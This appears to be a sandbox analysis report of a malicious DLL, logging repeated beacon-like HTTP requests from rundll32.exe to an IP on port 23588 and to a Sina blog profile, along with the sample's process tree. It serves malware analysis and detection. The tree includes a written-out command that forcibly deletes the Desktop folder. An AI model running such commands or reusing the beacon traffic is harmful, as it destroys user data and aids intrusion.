Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
114 | 192.168.2.5 | 51417 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:12.983561039 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:36:14.681391954 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:36:14 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
115 | 192.168.2.5 | 51418 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:12.983938932 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
116 | 192.168.2.5 | 52889 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:16.716223955 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.5 | 52994 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:16.839204073 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.5 | 52993 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:16.839675903 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.5 | 55567 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:20.741781950 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
120 | 192.168.2.5 | 55602 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:20.852978945 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
121 | 192.168.2.5 | 55604 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:20.860780954 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
122 | 192.168.2.5 | 57794 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:24.749413013 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
123 | 192.168.2.5 | 57901 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:24.866692066 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:36:26.715501070 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:36:26 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
124 | 192.168.2.5 | 57903 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:24.869019985 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
125 | 192.168.2.5 | 60254 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:28.763494015 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
126 | 192.168.2.5 | 60361 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:28.893871069 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
127 | 192.168.2.5 | 60362 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:28.893976927 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:36:30.696933985 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:36:30 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
128 | 192.168.2.5 | 62635 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:32.816405058 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
129 | 192.168.2.5 | 62667 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:32.954329014 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
130 | 192.168.2.5 | 63422 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:34.732695103 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
131 | 192.168.2.5 | 64310 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:36.318475008 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:36:38.041745901 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:36:37 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
132 | 192.168.2.5 | 64311 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:36.318864107 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
133 | 192.168.2.5 | 64313 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:36.323465109 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
134 | 192.168.2.5 | 50290 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:40.332423925 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
135 | 192.168.2.5 | 50407 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:40.440642118 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:36:42.322608948 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:36:42 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
136 | 192.168.2.5 | 50408 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:40.443932056 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
137 | 192.168.2.5 | 52832 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:44.488199949 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
138 | 192.168.2.5 | 52878 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:44.533876896 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
139 | 192.168.2.5 | 53368 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:46.002109051 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:36:47.818226099 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:36:47 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
140 | 192.168.2.5 | 54804 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:48.589313030 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
141 | 192.168.2.5 | 54823 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:48.724044085 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
142 | 192.168.2.5 | 54824 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:48.728028059 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:36:50.547456026 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:36:50 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
143 | 192.168.2.5 | 56890 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:52.834722996 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
144 | 192.168.2.5 | 56892 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:52.836296082 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
Dec 19, 2024 15:36:54.668972015 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:36:54 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
145 | 192.168.2.5 | 56893 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:52.836488008 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
146 | 192.168.2.5 | 59231 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:56.870379925 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
147 | 192.168.2.5 | 59313 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:56.993143082 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
148 | 192.168.2.5 | 59314 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:36:56.995450974 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
Dec 19, 2024 15:36:58.732543945 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:36:58 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
149 | 192.168.2.5 | 61952 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:37:00.998501062 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 50003 | 116.133.8.92 | 443 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 14:34:05 UTC | 142 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 50097 | 116.133.8.92 | 443 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 14:34:13 UTC | 142 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 50187 | 116.133.8.92 | 443 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 14:34:22 UTC | 142 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 50283 | 116.133.8.92 | 443 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 14:34:30 UTC | 142 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 51237 | 116.133.8.92 | 443 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 14:35:06 UTC | 142 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 51452 | 116.133.8.92 | 443 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 14:35:10 UTC | 142 | OUT | GET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Connection: Keep-Alive


                                                                                                                                          Target ID:0
                                                                                                                                          Start time:09:33:14
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:loaddll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll"
                                                                                                                                          Imagebase:0x120000
                                                                                                                                          File size:126'464 bytes
                                                                                                                                          MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:1
                                                                                                                                          Start time:09:33:14
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:2
                                                                                                                                          Start time:09:33:14
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",#1
                                                                                                                                          Imagebase:0x790000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:09:33:14
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,DoAddToFavDlg
                                                                                                                                          Imagebase:0x580000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:09:33:14
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",#1
                                                                                                                                          Imagebase:0x580000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:09:33:14
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                                                                                                                          Imagebase:0x790000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:09:33:14
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:7
                                                                                                                                          Start time:09:33:14
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:ping 127.0.0.1 -n 3
